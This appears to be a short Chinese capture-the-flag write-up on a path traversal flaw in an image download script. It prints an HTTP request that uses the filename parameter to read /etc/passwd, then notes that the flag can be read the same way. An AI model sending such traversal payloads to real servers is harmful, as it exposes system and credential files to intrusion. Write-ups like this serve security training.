0x01:漏洞点
他的标题已经告诉我们路径在哪里,所以我们直接访问/_admin/imgdownload.php
OK啊白白的一片,直接丢Yakit里面去 教训他。
0x02:操作部分
报告长官,一切正常!!未发现连接错误!!!
现在我们知道题目说filename参数存在漏洞,我们直接控制参数!!!!!goggogo
直接来一套!!!
GET /_admin/imgdownload.php?filename=../../../../../etc/passwd HTTP/1.1
Host: URL
ok 可以发现可以通过filename参数进行读取,所以我们直接读取flag终结他吧!!!!!!!